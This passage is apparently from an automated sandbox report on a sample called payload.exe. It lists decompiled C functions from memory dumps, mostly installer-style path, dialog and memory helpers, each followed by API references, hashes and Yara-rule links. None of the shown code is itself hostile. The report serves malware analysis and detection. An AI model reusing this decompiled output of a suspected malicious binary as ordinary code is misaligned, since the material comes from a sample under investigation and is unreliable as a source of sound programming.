LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
SendMessageA.USER32 ref: 00401D1E
DeleteObject.GDI32(00000000), ref: 00401D2D

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 402adc48c185e678c0eab13fcd9adc41762ceb24662fb25a5471487454e9d394
Instruction ID: 14b9f5ff68e8b0ed0f2204d74c17d06140583eb6ed2bbf798243b331d3a4cd3b
Opcode Fuzzy Hash: 402adc48c185e678c0eab13fcd9adc41762ceb24662fb25a5471487454e9d394
Instruction Fuzzy Hash: A9F0E7B2A04114AFEB01ABE4DE88DAFB7BDEB54305B10447AF602F6191C7789D018B79

Uniqueness

Uniqueness Score: -1.00%

Function 004046D3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004046D3(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405D1B(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405D1B(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405D1B(_t41, _t47, 0x41fd08, 0x41fd08, _a8);
				wsprintfA(_t32 + lstrlenA(0x41fd08), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x422ed8, _a4, 0x41fd08);
			}

0x004046d9
0x004046de
0x004046e6
0x004046e7
0x004046f4
0x004046fc
0x004046fd
0x004046ff
0x00404701
0x00404703
0x00404706
0x00404706
0x0040470d
0x00404713
0x00404713
0x0040471a
0x00404721
0x00404724
0x00404727
0x00404727
0x0040472b
0x0040473b
0x0040473d
0x00404740
0x004046e9
0x004046e9
0x004046f0
0x004046f0
0x00404748
0x00404753
0x00404769
0x00404779
0x00404795

APIs

lstrlenA.KERNEL32(0041FD08,0041FD08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045EE,000000DF,00000000,00000400,?), ref: 00404771
wsprintfA.USER32 ref: 00404779
SetDlgItemTextA.USER32(?,0041FD08), ref: 0040478C

Strings

%u.%u%s%s, xrefs: 0040475B

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: bbe280539c3cc3020c43bf789c637de2f8d0099704e891219e4d784778b6cf22
Instruction ID: 079308417c3a62341de1df324b483ce4e469374b9790fc4fe8de96a48b85a08e
Opcode Fuzzy Hash: bbe280539c3cc3020c43bf789c637de2f8d0099704e891219e4d784778b6cf22
Instruction Fuzzy Hash: F011A573A0412837EB0065699C45EAF3298DB86374F254637FA25F71D2EA788C5245A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040576B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040576B(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409014);
				}
				return _t7;
			}

0x0040576c
0x00405783
0x0040578b
0x0040578b
0x00405793

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030C6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405771
CharPrevA.USER32(?,00000000), ref: 0040577A
lstrcatA.KERNEL32(?,00409014), ref: 0040578B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040576B

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4017390910
Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction ID: 00e6a1abdfef3fccf4d12e3b382aa79108487555f8088e95eeaee7bf5793dfbe
Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction Fuzzy Hash: 94D0A9B2A05A307AD3122715AC0DE8B2A08CF82300B094023F200B72A2CB3C1D418BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00405804 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405804(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405796(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}

0x0040580d
0x00405814
0x00405817
0x00405819
0x0040581d
0x00405832
0x00405851
0x00000000
0x00405839
0x0040583b
0x0040583c
0x0040583f
0x00405840
0x00405848
0x00000000
0x00000000
0x0040584a
0x0040584d
0x00000000
0x00000000
0x00000000
0x0040584d
0x00000000
0x0040583c
0x0040582a
0x00000000
0x0040582b

APIs

CharNextA.USER32(?), ref: 00405812
CharNextA.USER32(00000000), ref: 00405817
CharNextA.USER32(00000000), ref: 0040582B

Strings

C:\Users\user\AppData\Local\Temp\nsg90FC.tmp, xrefs: 00405805

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsg90FC.tmp
API String ID: 3213498283-2787541972
Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
Instruction ID: 4ca260c7e1a22d06af12069221c3406c2bee361732d71c1e98a9e22686a99acb
Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
Instruction Fuzzy Hash: 71F0C253908F942BFB3276641C44B675F88DB55350F04C07BEA80B62C2C6788860CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C02(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4168c0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42370c;
						if(_t2 >  *0x42370c) {
							_t3 = CreateDialogParamA( *0x423700, 0x6f, 0, E00402B7F, 0);
							 *0x4168c0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E004060CE(0);
					}
				} else {
					_t6 =  *0x4168c0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4168c0 = 0;
					return _t6;
				}
			}

0x00402c09
0x00402c23
0x00402c29
0x00402c33
0x00402c39
0x00402c3f
0x00402c50
0x00402c59
0x00000000
0x00402c5e
0x00402c65
0x00402c2b
0x00402c32
0x00402c32
0x00402c0b
0x00402c0b
0x00402c12
0x00402c15
0x00402c15
0x00402c1b
0x00402c22
0x00402c22

APIs

DestroyWindow.USER32 ref: 00402C15
GetTickCount.KERNEL32(00000000,00402DE2,00000001), ref: 00402C33
CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
ShowWindow.USER32(00000000,00000005), ref: 00402C5E

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: bb4189f2555980a5a403f1716edff6096ea92162ad211e01232e213a33bdd725
Instruction ID: 69bd14cd8f1a0d496662edafeb8c2727d8675a530a128bc1770b64b88ff4c26b
Opcode Fuzzy Hash: bb4189f2555980a5a403f1716edff6096ea92162ad211e01232e213a33bdd725
Instruction Fuzzy Hash: 2CF05E7090A220ABD6217F64FE0CDDF7BA4FB41B527018576F144B21E4C379988ACB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040393E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040393E(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405C70(__ecx, "1033");
				while(1) {
					_t26 =  *0x423744;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423710 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423740;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x422ee0 = _t18[1];
					 *0x4237a8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x422edc = _t23;
						E00405C57(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x41fce8, E00405D1B(_t13, _t24, _t26, 0x422f00, 0xfffffffe));
						_t11 =  *0x42372c;
						_t27 =  *0x423728;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405D1B(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x00403942
0x00403947
0x0040394d
0x00403952
0x00403952
0x0040395a
0x00000000
0x00000000
0x00403962
0x0040396a
0x0040396c
0x00403972
0x00403972
0x00403974
0x00403980
0x00000000
0x00000000
0x00403984
0x00000000
0x00000000
0x00000000
0x00403986
0x0040398b
0x00403994
0x0040399a
0x0040399f
0x004039b3
0x004039be
0x004039d6
0x004039dc
0x004039e1
0x004039e9
0x00403a0a
0x00403a0a
0x00403a0a
0x004039eb
0x004039ed
0x004039ed
0x004039f1
0x004039f8
0x004039f8
0x004039fd
0x00403a03
0x00403a03
0x00000000
0x004039ed
0x004039a1
0x004039a6
0x004039af
0x004039a8
0x004039a8
0x004039a8
0x004039a6

APIs

SetWindowTextA.USER32(00000000,00422F00), ref: 004039D6

Strings

1033, xrefs: 00403942, 0040394C, 004039BD
"C:\Users\user\Desktop\payload.exe", xrefs: 0040393F

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\payload.exe"$1033
API String ID: 530164218-3755999389
Opcode ID: 486f1793fc8ee117fab60480f2aa26aac85a5ca9132015367b3694c6ae5d67fc
Instruction ID: 79edc1b1becbb318b5d11430581b7fe373163fbdb48c995140def98ab9010f1e
Opcode Fuzzy Hash: 486f1793fc8ee117fab60480f2aa26aac85a5ca9132015367b3694c6ae5d67fc
Instruction Fuzzy Hash: B311F3F1B04611ABCB20DF14DD809737BADEBC4756328823FE941A73A0C67D9D029B98

Uniqueness

Uniqueness Score: -1.00%

Function 004035E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035E4() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41eccc; // 0x60e400
				_t3 = E004035C9(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41eccc =  *0x41eccc & 0x00000000;
				return _t3;
			}

0x004035e5
0x004035ed
0x004035f4
0x004035f7
0x004035f7
0x004035f9
0x004035fe
0x00403605
0x0040360b
0x0040360f
0x00403610
0x00403618

APIs

FreeLibrary.KERNEL32(?,75572754,00000000,C:\Users\user\AppData\Local\Temp\,004035BC,004033D6,?), ref: 004035FE
GlobalFree.KERNEL32(0060E400), ref: 00403605

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004035E4

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-4017390910
Opcode ID: a52acb0b260d536fd7618f3e20de318eec4c6c539c6bb2def64801f0e67eaa78
Instruction ID: f6c6d059f9b75f5cc6a79e0049e3afa1176d7e4558308c53008dbe788c85df41
Opcode Fuzzy Hash: a52acb0b260d536fd7618f3e20de318eec4c6c539c6bb2def64801f0e67eaa78
Instruction Fuzzy Hash: 3EE0C2338100206BC7211F0AED04B5E77AC6F48B22F054066FC407B3A08B742C418BCC

Uniqueness

Uniqueness Score: -1.00%

Function 004057B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057B2(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x004057b3
0x004057bd
0x004057bf
0x004057c6
0x004057ce
0x00000000
0x00000000
0x00000000
0x004057ce
0x004057d0
0x004057d5

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\payload.exe,C:\Users\user\Desktop\payload.exe,80000000,00000003), ref: 004057B8
CharPrevA.USER32(80000000,00000000), ref: 004057C6

Strings

C:\Users\user\Desktop, xrefs: 004057B2

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-66916594
Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction ID: 15550f116ff3ce815c4487a542d9ae56249738f0e4d38f85a76656e2d55d0e49
Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction Fuzzy Hash: FAD0C7B2409D705EF31353149C08B9F6A58DF16700F195463E141EB591C6785D415BBD

Uniqueness

Uniqueness Score: -1.00%

Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556, _t52);
				_t43 =  *0x1000405c +  *0x1000405c * 4 << 2;
				_t17 = E1000123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E10001266(E100012AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E100012D1( *_t55 - 0x30, E1000123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x10004030;
								 *0x10004030 = _t31;
								E10001508(_t31 + 4,  *0x10004064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x10004030;
							if( *0x10004030 != 0) {
								E10001508( *0x10004064, _t34 + 4, _t43);
								_t37 =  *0x10004030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x10004030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x100010e7
0x100010ef
0x10001103
0x1000110b
0x10001116
0x10001119
0x10001121
0x10001124
0x10001126
0x100011c4
0x100011d0
0x1000112c
0x1000112d
0x1000112d
0x10001130
0x10001131
0x10001134
0x10001203
0x10001206
0x1000119e
0x100011a4
0x100011ac
0x100011b1
0x100011b4
0x00000000
0x100011b4
0x10001209
0x1000120a
0x10001186
0x1000118c
0x10001194
0x00000000
0x10001194
0x10001152
0x10001153
0x1000115b
0x10001168
0x10001170
0x10001179
0x1000117e
0x1000117e
0x00000000
0x10001153
0x1000113a
0x100011d1
0x100011d1
0x100011d8
0x100011e5
0x100011ea
0x100011ef
0x100011f5
0x100011fb
0x100011fb
0x00000000
0x100011d8
0x10001140
0x10001143
0x00000000
0x00000000
0x10001149
0x1000114c
0x1000119b
0x00000000
0x1000119b
0x1000114f
0x10001150
0x10001183
0x00000000
0x10001183
0x00000000
0x100011ba
0x100011ba
0x00000000
0x100011c3

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
GlobalFree.KERNEL32(00000000), ref: 100011B4
GlobalFree.KERNEL32(?), ref: 100011C7
GlobalFree.KERNEL32(?), ref: 100011F5

Memory Dump Source

Source File: 00000001.00000002.1417066379.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.1417055818.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417073030.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417078966.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_payload.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
